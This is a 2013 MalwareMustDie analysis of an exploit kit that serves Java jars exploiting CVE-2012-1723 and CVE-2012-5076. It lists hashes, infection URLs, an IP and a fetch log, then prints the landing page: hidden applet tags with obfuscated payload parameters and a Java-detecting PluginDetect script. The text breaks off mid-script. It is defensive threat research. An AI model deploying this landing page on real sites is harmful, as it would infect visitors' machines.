
#MMD - JAR CVE-2012-1723 + CVE-2012-5076 JAR Analysis #Guide

MalwareMustDie Jan 8th, 2013
================================================================================
#MalwareMustDie - Tue Jan  8 21:36:28 JST 2013
Unknown Exploit Kit dropping 2 jars for the payload (in the applet parts),
using a modified PluginDetect script, w/o payload leads.
This is an analysis GUIDE of the Jar CVE-2012-1723 + CVE-2012-5076
(sorry, not enough time.. can't check the payload yet.
pls continue or follow from this lead)
================================================================================
first jar: jimmdemy.jar
MD5:    be2bcd6c3f2aee6432358e1fb37a8dc2
File size:      9.2 KB ( 9465 bytes )
File name:      jimmdemy.jar
File type:      JAR
Tags:   exploit jar cve-2012-1723
Detection ratio:        7 / 45  <========== IMPORTANT!!!
Analysis date:  2013-01-08 10:40:02 UTC ( 25 min ago )
https://www.virustotal.com/file/2eb97401ca9954d4cf2ca5ad881598e9ea8981d6b89bd017e7b21bc0e153b70b/analysis/
================================================================================
second jar: torylane.jar
MD5:    ae66fc69244abec22f20384356806ad2
File size:      5.4 KB ( 5502 bytes )
File name:      torylane.jar
File type:      JAR
Tags:   jar
Detection ratio:        1 / 46  <======== LOW DETECTION!!
Analysis date:  2013-01-08 12:50:22 UTC ( 39 min ago )
https://www.virustotal.com/file/92ad670f3d32c91afffc60c54e9c5d19095d827ec86d2d89ebfa0a7856fa93e8/analysis/
================================================================================
 
//=====================
//Source of infection
//=====================
-------------------------------------------------------------------------
URL                                                             IP
-------------------------------------------------------------------------
afgarcia67.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070         217.23.6.57
davidsonfrc89.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070      217.23.6.57
-------------------------------------------------------------------------
 
// Checked, it was the same landing page code, so I focus on one:
URL: davidsonfrc89.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070
 
// a fetch log... (PS: can't download too many times w/ the same params..)
 
--18:17:07--  h00p://davidsonfrc89.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070
           => `lavaafly.php@janeoleg=875070'
Resolving davidsonfrc89.net... seconds 0.00, 217.23.6.57
Caching davidsonfrc89.net => 217.23.6.57
Connecting to davidsonfrc89.net|217.23.6.57|:80... seconds 0.00, connected.
  :
GET /Jdowu32ds2s/lavaafly.php?janeoleg=875070 HTTP/1.0
 
User-Agent: #MalwareMustDie Playing with your jars
Accept: */*
Host: davidsonfrc89.net
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 08 Jan 2013 07:30:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
 :
200 OK
Registered socket 3 for persistent reuse.
URI content encoding = `UTF-8'
Length: unspecified [text/html]
Saving to: `lavaafly.php?janeoleg=875070'
2013-01-08 16:30:35 (33.6 KB/s) - `lavaafly.php?janeoleg=875070' saved [29766]
 
// It's an obfuscated HTML page with a PluginDetect script:
 
================================================================================
 
//=====================
//Landing page
// *) the payload URLs appear only in the applet parts...
//=====================
  82. <applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1"><param name="bhjwfffiorjwe" value="0jfX19NXhX1MMX0ZltNjk9k/agtjNgs9hgZpBVthZX8.:jfg2.8/N/sljhaf0f/2lMBM9atrZag3Bd38oXfVNsB.fs0jC1BhtgeMZ/8j.30tajCCNNZtt9sX/0Ndga98shkk0CsCVN3VgB0gVkfs09kZi30MBdV..aNsfVftf3nV99fkgt2tBf/jas1.o2sXt2XtfnVh./hj8.itVfkaftCoC/30aCV399d/B1/3M.j8gBljBsn33h/khB9efZZglsj3thkNasMNg/j8.glXXtJZ8.CdXMNdt33ststhohXMZ/38dw92B8gl32u.8Zkg30g39BX21Xkl2lCXaXMjfdj8kC/aZ/s33sf280C2ZdMk9Cj3sd2/1jdaN/adltfB/kjNlNf/k3gaMhBk/8aknVt3/d.MjukXjZldVCdfs/dh2C1ekk3st.f0n.dCdkaZgtB120/Nhj.CjZ.al0jpjCgjC0.Ch3B2lCjZdp"></applet><applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1"><param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt0djf3j32t21/Z.M0.p1C3X3a/g:1h.ZM2Zs/t1Z/.g92/l0flsta8rV/gXth/1oV3dl0Vj1sM1VMlZjdesXffXhsdtfN1h2VlNtBfCf.8tgaB020sa3fsBkBsX0g8gdlka9jXhiBkVXtV/Cah1fZ9d1gnghX/t39jtt.f2d2k9o.2htZjV2nt/j2ktdXih1NgVfC0oj/NZ90j19NB9.8M98.gaVXa8lMnCC2f3ZtsegXCsd331tZ00hlZdN/N8aB1ktgJ980Vf09Vdjg2Zj0k1og3lNhft8wkaZ/dZf.uftCC0Mf/32lMl9C8k2N/V8dV0Md1kh/CC//sCBBh.8f22/131h132s0BV/dgh//XV3kj2s3jg0jgBXkNajljC8sMXn0lZ/N93tuM9d0CgCtdl8gVMBk0eVMfNB1tjn8Ndhflg0t3CMX.aXa.//0hN3akpfhV8l0s/hkgjNZVkgp"></applet><html><body></body><script type="text/javascript">var actojack={version:"ruptable",name:"actojack",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var 
e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.length);a++){if(g(c[a],10)>g(b[a],10)){return 1}if(g(c[a],10)<g(b[a],10)){return -1}}}return 0},formatNum:function(b,c){var d=this,a,e;if(!d.isStrNum(b)){return null}if(!d.isNum(c)){c=4}c--;e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a<4;a++){if(/^(0+)(.+)$/.test(e[a])){e[a]=RegExp.$2}if(a>c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return function(c){if(!a.isIE&&c){var f,e,b,d=a.isArray(c)?c:(a.isString(c)?[c]:[]);for(b=0;b<d.length;b++){if(a.isString(d[b])&&/[^\s]/.test(d[b])){f=navigator.mimeTypes[d[b]];e=f?f.enabledPlugin:0;if(e&&(e.name||e.description)){return f}}}}return null}},findNavPlugin:function(l,e,c){var j=this,h=new RegExp(l,"i"),d=(!j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){m=a[f].description||g;b=a[f].name||g;if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))){if(!k||!(k.test(m)||k.test(b))){return a[f]}}}return null},getMimeEnabledPlugin:function(k,m,c){var e=this,f,b=new RegExp(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;for(d=0;d<j.length;d++){if((f=e.hasMimeType(j[d]))&&(f=f.enabledPlugin)){l=f.description||h;a=f.name||h;if(b.test(l)||b.test(a)){if(!g||!(g.test(l)||g.test(a))){return f}}}}return 0},getPluginFileVersion:function(f,b){var h=this,e,d,g,a,c=-1;if(h.OS>2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){return e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a<d.length;a++){if(c>-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a}if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(a){var 
f=null,d,b=this,c={};try{f=new b.AXO(a)}catch(d){}return f},convertFuncs:function(f){var a,g,d,b=/^[\$][\$]/,c=this;for(a in f){if(b.test(a)){try{wx=2;g=a.slice(wx);if(g.length>0&&!f[g]){f[g]=f[a](f);delete f[a]}}catch(d){}}}},initObj:function(e,b,d){var a,c;if(e){if(e[b[0]]==1||d){for(a=0;a<b.length;a=a+2){e[b[a]]=b[a+1]}}for(a in e){c=e[a];if(c&&c[b[0]]==1){this.initObj(c,b)}}}},initScript:function(){var c=this,a=navigator,e="/",f,i=a.userAgent||"",g=a.vendor||"",b=a.platform||"",h=a.product||"";c.initObj(c,["$",c]);for(f in c.Plugins){if(c.Plugins[f]){c.initObj(c.Plugins[f],["$",c,"$$",c.Plugins[f]],1)}};c.OS=100;if(b){var d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win.*CE",22.1,"Win.*Mobile",22.2,"Pocket\s*PC",22.3,"",100];for(f=d.length-2;f>=0;f=f-2){if(d[f]&&new RegExp(d[f],"i").test(b)){c.OS=d[f+1];break}}}c.convertFuncs(c);c.head=(document.getElementsByTagName("head")[0]||document.getElementsByTagName("body")[0]||document.body||null);c.isIE=(new Function("return "+e+"*@cc_on!@*"+e+"false"))();c.verIE=c.isIE&&(/MSIE\s*(\d+\.?\d*)/i).test(i)?parseFloat(RegExp.$1,10):null;c.ActiveXEnabled=false;if(c.isIE){var 
f,j=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.Dictionary","wmplayer.ocx"];for(f=0;f<j.length;f++){if(c.getAXO(j[f])){c.ActiveXEnabled=true;break}}}c.isGecko=(/Gecko/i).test(h)&&(/Gecko\s*\/\s*\d/i).test(i);c.verGecko=c.isGecko?c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i)?RegExp.$1:"0.9"):null;c.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);c.verChrome=c.isChrome?c.formatNum(RegExp.$1):null;c.isSafari=((/Apple/i).test(g)||(!g&&!c.isChrome))&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);c.verSafari=c.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(i)?c.formatNum(RegExp.$1):null;c.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(i)||1)?parseFloat(RegExp.$1,10):null;c.addWinEvent("load",c.handler(c.runWLfuncs,c))},init:function(d){var c=this,b,d,a={status:-3,plugin:0};if(!c.isString(d)){return a}if(d.length==1){c.getVersionDelimiter=d;return a}d=d.toLowerCase().replace(/\s/g,"");b=c.Plugins[d];if(!b||!b.getVersion){return a}a.plugin=b;if(!c.isDefined(b.installed)){b.installed=null;b.version=null;b.version0=null;b.getVersionDone=null;b.pluginName=d}c.garbage=false;if(c.isIE&&!c.ActiveXEnabled&&d!=="java"){a.status=-2;return a}a.status=1;return a},fPush:function(b,a){var c=this;if(c.isArray(a)&&(c.isFunc(b)||(c.isArray(b)&&b.length>0&&c.isFunc(b[0])))){a.push(b)}},callArray:function(b){var c=this,a;if(c.isArray(b)){for(a=0;a<b.length;a++){if(b[a]===null){return}c.call(b[a]);b[a]=null}}},call:function(c){var b=this,a=b.isArray(c)?c.length:-1;if(a>0&&b.isFunc(c[0])){c[0](b,a>1?c[1]:0,a>2?c[2]:0,a>3?c[3]:0)}else{if(b.isFunc(c)){c(b)}}},$$isMinVersion:function(a){return function(h,g,d,c){var e=a.init(h),f,b=-1,j={};if(e.status<0){return 
e.status}f=e.plugin;g=a.formatNum(a.isNum(g)?g.toString():(a.isStrNum(g)?a.getNum(g):"0"));if(f.getVersionDone!=1){f.getVersion(g,d,c);if(f.getVersionDone===null){f.getVersionDone=1}}a.cleanup();if(f.installed!==null){b=f.installed<=0.5?f.installed:(f.installed==0.7?1:(f.version===null?0:(a.compareNums(f.version,g,f)>=0?1:-0.1)))};return b}},getVersionDelimiter:",",$$getVersion:function(a){return function(g,d,c){var e=a.init(g),f,b,h={};if(e.status<0){return null};f=e.plugin;if(f.getVersionDone!=1){f.getVersion(null,d,c);if(f.getVersionDone===null){f.getVersionDone=1}}a.cleanup();b=(f.version||f.version0);b=b?b.replace(a.splitNumRegx,a.getVersionDelimiter):b;return b}},cleanup:function(){var a=this;if(a.garbage&&a.isDefined(window.CollectGarbage)){window.CollectGarbage()}},addWinEvent:function(d,c){var e=this,a=window,b;if(e.isFunc(c)){if(a.addEventListener){a.addEventListener(d,c,false)}else{if(a.attachEvent){a.attachEvent("on"+d,c)}else{b=a["on"+d];a["on"+d]=e.winHandler(c,b)}}}},winHandler:function(d,c){return function(){d();if(typeof c=="function"){c()}}},WLfuncs0:[],WLfuncs:[],runWLfuncs:function(a){var b={};a.winLoaded=true;a.callArray(a.WLfuncs0);a.callArray(a.WLfuncs);if(a.onDoneEmptyDiv){a.onDoneEmptyDiv()}},winLoaded:false,$$onWindowLoaded:function(a){return function(b){if(a.winLoaded){a.call(b)}else{a.fPush(b,a.WLfuncs)}}},$$onDetectionDone:function(a){return function(h,g,c,b){var d=a.init(h),k,e,j={};if(d.status==-3){return -1}e=d.plugin;if(!a.isArray(e.funcs)){e.funcs=[]}if(e.getVersionDone!=1){k=a.isMinVersion?a.isMinVersion(h,"0",c,b):a.getVersion(h,c,b)}if(e.installed!=-0.5&&e.installed!=0.5){a.call(g);return 1}if(e.NOTF){a.fPush(g,e.funcs);return 0}return 1}},div:null,divID:"actojack",divWidth:50,pluginSize:1,emptyDiv:function(){var 
d=this,b,h,c,a,f,g;if(d.div&&d.div.childNodes){for(b=d.div.childNodes.length-1;b>=0;b--){c=d.div.childNodes[b];if(c&&c.childNodes){for(h=c.childNodes.length-1;h>=0;h--){g=c.childNodes[h];try{c.removeChild(g)}catch(f){}}}if(c){try{d.div.removeChild(c)}catch(f){}}}}if(!d.div){a=document.getElementById(d.divID);if(a){d.div=a}}if(d.div&&d.div.parentNode){try{d.div.parentNode.removeChild(d.div)}catch(f){}d.div=null}},DONEfuncs:[],onDoneEmptyDiv:function(){var c=this,a,b;if(!c.winLoaded){return}if(c.WLfuncs&&c.WLfuncs.length&&c.WLfuncs[c.WLfuncs.length-1]!==null){return}for(a in c){b=c[a];if(b&&b.funcs){if(b.OTF==3){return}if(b.funcs.length&&b.funcs[b.funcs.length-1]!==null){return}}}for(a=0;a<c.DONEfuncs.length;a++){c.callArray(c.DONEfuncs)}c.emptyDiv()},getWidth:function(c){if(c){var a=c.scrollWidth||c.offsetWidth,b=this;if(b.isNum(a)){return a}}return -1},getTagStatus:function(m,g,a,b){var c=this,f,k=m.span,l=c.getWidth(k),h=a.span,j=c.getWidth(h),d=g.span,i=c.getWidth(d);if(!k||!h||!d||!c.getDOMobj(m)){return -2}if(j<i||l<0||j<0||i<0||i<=c.pluginSize||c.pluginSize<1){return 0}if(l>=i){return -1}try{if(l==c.pluginSize&&(!c.isIE||c.getDOMobj(m).readyState==4)){if(!m.winLoaded&&c.winLoaded){return 1}if(m.winLoaded&&c.isNum(b)){if(!c.isNum(m.count)){m.count=b}if(b-m.count>=10){return 1}}}}catch(f){}return 0},getDOMobj:function(g,a){var f,d=this,c=g?g.span:0,b=c&&c.firstChild?1:0;try{if(b&&a){d.div.focus()}}catch(f){}return b?c.firstChild:null},setStyle:function(b,g){var f=b.style,a,d,c=this;if(f&&g){for(a=0;a<g.length;a=a+2){try{f[g[a]]=g[a+1]}catch(d){}}}},insertDivInBody:function(a,i){var h,f=this,b="pd33993399",d=null,j=i?window.top.document:window.document,c="<",g=(j.getElementsByTagName("body")[0]||j.body);if(!g){try{j.write(c+'div 
id="'+b+'">o'+c+"/div>");d=j.getElementById(b)}catch(h){}}g=(j.getElementsByTagName("body")[0]||j.body);if(g){if(g.firstChild&&f.isDefined(g.insertBefore)){g.insertBefore(a,g.firstChild)}else{g.appendChild(a)}if(d){g.removeChild(d)}}else{}},insertHTML:function(g,b,h,a,l){var m,n=document,k=this,q,p=n.createElement("span"),o,j,f="<";var c=["outlineStyle","none","borderStyle","none","padding","0px","margin","0px","visibility","visible"];var i="outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";if(!k.isDefined(a)){a=""}if(k.isString(g)&&(/[^\s]/).test(g)){g=g.toLowerCase().replace(/\s/g,"");q=f+g+' width="'+k.pluginSize+'" height="'+k.pluginSize+'" ';q+='style="'+i+'display:inline;" ';for(o=0;o<b.length;o=o+2){if(/[^\s]/.test(b[o+1])){q+=b[o]+'="'+b[o+1]+'" '}}q+=">";for(o=0;o<h.length;o=o+2){if(/[^\s]/.test(h[o+1])){q+=f+'param name="'+h[o]+'" value="'+h[o+1]+'" />'}}q+=a+f+"/"+g+">"}else{q=a}if(!k.div){j=n.getElementById(k.divID);if(j){k.div=j}else{k.div=n.createElement("div");k.div.id=k.divID}k.setStyle(k.div,c.concat(["width",k.divWidth+"px","height",(k.pluginSize+3)+"px","fontSize",(k.pluginSize+3)+"px","lineHeight",(k.pluginSize+3)+"px","verticalAlign","baseline","display","block"]));if(!j){k.setStyle(k.div,["position","absolute","right","0px","top","0px"]);k.insertDivInBody(k.div)}}if(k.div&&k.div.parentNode){k.setStyle(p,c.concat(["fontSize",(k.pluginSize+3)+"px","lineHeight",(k.pluginSize+3)+"px","verticalAlign","baseline","display","inline"]));try{p.innerHTML=q}catch(m){};try{k.div.appendChild(p)}catch(m){};return{span:p,winLoaded:k.winLoaded,tagName:g,outerHTML:q}}return{span:null,winLoaded:k.winLoaded,tagName:"",outerHTML:q}},file:{$:1,any:"fileStorageAny999",valid:"fileStorageValid999",save:function(d,f,c){var b=this,e=b.$,a;if(d&&e.isDefined(c)){if(!d[b.any]){d[b.any]=[]}if(!d[b.valid]){d[b.valid]=[]}d[b.any].push(c);a=b.split(f,c);if(a){d[b.valid].push(a)}}},getValidLength:function(a){return 
a&&a[this.valid]?a[this.valid].length:0},getAnyLength:function(a){return a&&a[this.any]?a[this.any].length:0},getValid:function(c,a){var b=this;return c&&c[b.valid]?b.get(c[b.valid],a):null},getAny:function(c,a){var b=this;return c&&c[b.any]?b.get(c[b.any],a):null},get:function(d,a){var c=d.length-1,b=this.$.isNum(a)?a:c;return(b<0||b>c)?null:d[b]},split:function(g,c){var b=this,e=b.$,f=null,a,d;g=g?g.replace(".","\."):"";d=new RegExp("^(.*[^\/])("+g+"\s*)$");if(e.isString(c)&&d.test(c)){a=(RegExp.$1).split("/");f={name:a[a.length-1],ext:RegExp.$2,full:c};a[a.length-1]="";f.path=a.join("/")}return f},z:0},Plugins:{java:{mimeType:["application/x-java-applet","application/x-java-vm","application/x-java-bean"],classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",navigator:{a:window.navigator.javaEnabled(),javaEnabled:function(){return this.a},mimeObj:0,pluginObj:0},OTF:null,minIEver:7,debug:0,debugEnable:function(){var a=this,b=a.$;a.debug=1},isDisabled:{$:1,DTK:function(){var a=this,c=a.$,b=a.$$;if((c.isGecko&&c.compareNums(c.verGecko,c.formatNum("1.6"))<=0)||(c.isSafari&&c.OS==1&&(!c.verSafari||c.compareNums(c.verSafari,"5,1,0,0")<0))||c.isChrome||(c.isIE&&!c.ActiveXEnabled)){return 1}return 0},AXO:function(){var a=this,c=a.$,b=a.$$;return(!c.isIE||!c.ActiveXEnabled||(!b.debug&&b.DTK.query().status!==0))},navMime:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},navPlugin:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},windowDotJava:function(){var a=this,c=a.$,b=a.$$;if(!window.java){return 1}if(c.OS==2&&c.verOpera&&c.verOpera<9.2&&c.verOpera>=9){return 1}if(c.verGecko&&c.compareNums(c.verGecko,"1,9,0,0")<0&&c.compareNums(c.verGecko,"1,8,0,0")>=0){return 1}return 0},allApplets:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.OS>=20){return 0}if(d.verOpera&&d.verOpera<11&&!a.javaEnabled()&&!c.lang.System.getProperty()[0]){return 
1}if((d.verGecko&&d.compareNums(d.verGecko,d.formatNum("2"))<0)&&!a.mimeObj&&!c.lang.System.getProperty()[0]){return 1}return 0},AppletTag:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;return d.isIE?!a.javaEnabled():0},ObjectTag:function(){var a=this,c=a.$,b=a.$$;return c.isIE?!c.ActiveXEnabled:0},z:0},getVerifyTagsDefault:function(){var a=this,c=a.$,b=[1,0,1];if(c.OS>=20){return b}if((c.isIE&&(c.verIE<9||!c.ActiveXEnabled))||(c.verGecko&&c.compareNums(c.verGecko,c.formatNum("2"))<0)||(c.isSafari&&(!c.verSafari||c.compareNums(c.verSafari,c.formatNum("4"))<0))||(c.verOpera&&c.verOpera<10)){b=[1,1,1]}return b},getVersion:function(j,g,i){var b=this,d=b.$,e,a=b.applet,h=b.verify,k=b.navigator,f=null,l=null,c=null;if(b.getVersionDone===null){b.OTF=0;k.mimeObj=d.hasMimeType(b.mimeType);if(k.mimeObj){k.pluginObj=k.mimeObj.enabledPlugin}if(h){h.begin()}}a.setVerifyTagsArray(i);d.file.save(b,".jar",g);if(b.getVersionDone===0){if(a.should_Insert_Query_Any()){e=a.insert_Query_Any();b.setPluginStatus(e[0],e[1],f)}return}if((!f||b.debug)&&b.DTK.query().version){f=b.DTK.version}if((!f||b.debug)&&b.navMime.query().version){f=b.navMime.version}if((!f||b.debug)&&b.navPlugin.query().version){f=b.navPlugin.version}if((!f||b.debug)&&b.AXO.query().version){f=b.AXO.version}if(b.nonAppletDetectionOk(f)){c=f}if(!c||b.debug||a.VerifyTagsHas(2.2)||a.VerifyTagsHas(2.5)){e=b.lang.System.getProperty();if(e[0]){f=e[0];c=e[0];l=e[1]}}b.setPluginStatus(c,l,f);if(a.should_Insert_Query_Any()){e=a.insert_Query_Any();if(e[0]){c=e[0];l=e[1]}}b.setPluginStatus(c,l,f)},nonAppletDetectionOk:function(b){var d=this,e=d.$,a=d.navigator,c=1;if(!b||(!a.javaEnabled()&&!d.lang.System.getPropertyHas(b))||(!e.isIE&&!a.mimeObj&&!d.lang.System.getPropertyHas(b))||(e.isIE&&!e.ActiveXEnabled)){c=0}else{if(e.OS>=20){}else{if(d.info&&d.info.getPlugin2Status()<0&&d.info.BrowserRequiresPlugin2()){c=0}}}return c},setPluginStatus:function(d,f,a){var 
c=this,e=c.$,b;a=a||c.version0;if(c.OTF>0){d=d||c.lang.System.getProperty()[0]}if(c.OTF<3){b=d?1:(a?-0.2:-1);if(c.installed===null||b>c.installed){c.installed=b}}if(c.OTF==2&&c.NOTF&&!c.applet.getResult()[0]&&!c.lang.System.getProperty()[0]){c.installed=a?-0.2:-1};if(c.OTF==3&&c.installed!=-0.5&&c.installed!=0.5){c.installed=(c.NOTF.isJavaActive(1)==1||c.lang.System.getProperty()[0])?0.5:-0.5}if(c.OTF==4&&(c.installed==-0.5||c.installed==0.5)){if(d){c.installed=1}else{if(c.NOTF.isJavaActive(1)==1){if(a){c.installed=1;d=a}else{c.installed=0}}else{if(a){c.installed=-0.2}else{c.installed=-1}}}};if(a){c.version0=e.formatNum(e.getNum(a))}if(d){c.version=e.formatNum(e.getNum(d))}if(f&&e.isString(f)){c.vendor=f}if(!c.vendor){c.vendor=""}if(c.verify&&c.verify.isEnabled()){c.getVersionDone=0}else{if(c.getVersionDone!=1){if(c.OTF<2){c.getVersionDone=0}else{c.getVersionDone=c.applet.can_Insert_Query_Any()?0:1}}}},DTK:{$:1,hasRun:0,status:null,VERSIONS:[],version:"",HTML:null,Plugin2Status:null,classID:["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA","clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],mimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],disabled:function(){return this.$$.isDisabled.DTK()},query:function(){var k=this,g=k.$,d=k.$$,j,l,h,m={},f={},a,c=null,i=null,b=(k.hasRun||k.disabled());k.hasRun=1;if(b){return k}k.status=0;if(g.isIE&&g.verIE>=6){for(l=0;l<k.classID.length;l++){k.HTML=g.insertHTML("object",["classid",k.classID[l]],[]);c=g.getDOMobj(k.HTML);try{if(c&&c.jvms){break}}catch(j){}}}else{if(!g.isIE&&(h=g.hasMimeType(k.mimeType))&&h.type){k.HTML=g.insertHTML("object",["type",h.type],[]);c=g.getDOMobj(k.HTML)}}if(c){try{a=c.jvms;if(a){i=a.getLength();if(g.isNum(i)){k.status=i>0?1:-1;for(l=0;l<i;l++){h=g.getNum(a.get(i-1-l).version);if(h){k.VERSIONS.push(h);f["a"+g.formatNum(h)]=1}}}}}catch(j){}}h=0;for(l in 
f){h++}if(h&&h!==k.VERSIONS.length){k.VERSIONS=[]}if(k.VERSIONS.length){k.version=g.formatNum(k.VERSIONS[0])};return k}},AXO:{$:1,hasRun:0,VERSIONS:[],version:"",disabled:function(){return this.$$.isDisabled.AXO()},JavaVersions:[[1,9,1,40],[1,8,1,40],[1,7,1,40],[1,6,0,40],[1,5,0,30],[1,4,2,30],[1,3,1,30]],query:function(){var a=this,e=a.$,b=a.$$,c=(a.hasRun||a.disabled());a.hasRun=1;if(c){return a}var i=[],k=[1,5,0,14],j=[1,6,0,2],h=[1,3,1,0],g=[1,4,2,0],f=[1,5,0,7],d=b.getInfo?true:false,l={};if(e.verIE>=b.minIEver){i=a.search(j,j,d);if(i.length>0&&d){i=a.search(k,k,d)}}else{if(d){i=a.search(f,f,true)}if(i.length==0){i=a.search(h,g,false)}}if(i.length){a.version=i[0];a.VERSIONS=[].concat(i)};return a},search:function(a,j,p){var h,d,f=this,e=f.$,k=f.$$,n,c,l,q,b,o,r,i=[];if(e.compareNums(a.join(","),j.join(","))>0){j=a}j=e.formatNum(j.join(","));var m,s="1,4,2,0",g="JavaPlugin."+a[0]+""+a[1]+""+a[2]+""+(a[3]>0?("_"+(a[3]<10?"0":"")+a[3]):"");for(h=0;h<f.JavaVersions.length;h++){d=f.JavaVersions[h];n="JavaPlugin."+d[0]+""+d[1];b=d[0]+"."+d[1]+".";for(l=d[2];l>=0;l--){r="JavaWebStart.isInstalled."+b+l+".0";if(e.compareNums(d[0]+","+d[1]+","+l+",0",j)>=0&&!e.getAXO(r)){continue}m=e.compareNums(d[0]+","+d[1]+","+l+",0",s)<0?true:false;for(q=d[3];q>=0;q--){c=l+"_"+(q<10?"0"+q:q);o=n+c;if(e.getAXO(o)&&(m||e.getAXO(r))){i.push(b+c);if(!p){return i}}if(o==g){return i}}if(e.getAXO(n+l)&&(m||e.getAXO(r))){i.push(b+l);if(!p){return i}}if(n+l==g){return i}}}return i}},navMime:{$:1,hasRun:0,mimetype:"",version:"",length:0,mimeObj:0,pluginObj:0,disabled:function(){return this.$$.isDisabled.navMime()},query:function(){var i=this,f=i.$,a=i.$$,b=(i.hasRun||i.disabled());i.hasRun=1;if(b){return i};var 
n=/^\s*application\/x-java-applet;jpi-version\s*=\s*(\d.*)$/i,g,l,j,d="",h="a",o,m,k={},c=f.formatNum("0");for(l=0;l<navigator.mimeTypes.length;l++){o=navigator.mimeTypes[l];m=o?o.enabledPlugin:0;g=o&&n.test(o.type||d)?f.formatNum(f.getNum(RegExp.$1)):0;if(g&&m&&(m.description||m.name)){if(!k[h+g]){i.length++}k[h+g]=o.type;if(f.compareNums(g,c)>0){c=g}}}g=k[h+c];if(g){o=f.hasMimeType(g);i.mimeObj=o;i.pluginObj=o?o.enabledPlugin:0;i.mimetype=g;i.version=c};return i}},navPlugin:{$:1,hasRun:0,version:"",disabled:function(){return this.$$.isDisabled.navPlugin()},query:function(){var m=this,e=m.$,c=m.$$,h=c.navigator,j,l,k,g,d,a,i,f=0,b=(m.hasRun||m.disabled());m.hasRun=1;if(b){return m};a=h.pluginObj.name||"";i=h.pluginObj.description||"";document.write('if(!f||c.debug){g=/Java[^\d]*Plug-in/i;l=g.test(i)?e.for'+'matNum(e.getNum(i)):0;k=g.test(a)?e.formatNum(e.getNum(a)):0;if(l&&(e.compareNums(l,e.formatNum("1,3"))<0||e.compareNums(l,e.formatNum("2"))>=0)){l=0}if(k&&(e.compareNums(k,e.formatNum("1,3"))<0||e.compareNums(k,e.formatNum("2"))>=0)){k=0}d=l&&k?(e.compareNums(l,k)>0?l:k):(l||k);if(d){f=d}}');if(!f&&e.isSafari&&e.OS==2){j=e.findNavPlugin("Java.*\d.*Plug-in.*Cocoa",0);if(j){l=e.getNum(j.description);if(l){f=l}}};if(f){m.version=e.formatNum(f)};return m}},lang:{$:1,System:{$:1,hasRun:0,result:[null,null],disabled:function(){return this.$$.isDisabled.windowDotJava()},getPropertyHas:function(a){var b=this,d=b.$,c=b.getProperty()[0];return(a&&c&&d.compareNums(d.formatNum(a),d.formatNum(c))===0)?1:0},getProperty:function(){var f=this,g=f.$,d=f.$$,i,h={},b=(f.hasRun||f.disabled());f.hasRun=1;if(!b){var a="java_qqq990";g[a]=null;try{var c=document.createElement("script");c.type="text/javascript";c.appendChild(document.createTextNode("(function(){var e;try{if (window.java && window.java.lang && window.java.lang.System){"+g.name+"."+a+'=[window.java.lang.System.getProperty("java.version")+" ",window.java.lang.System.getProperty("java.vendor")+" 
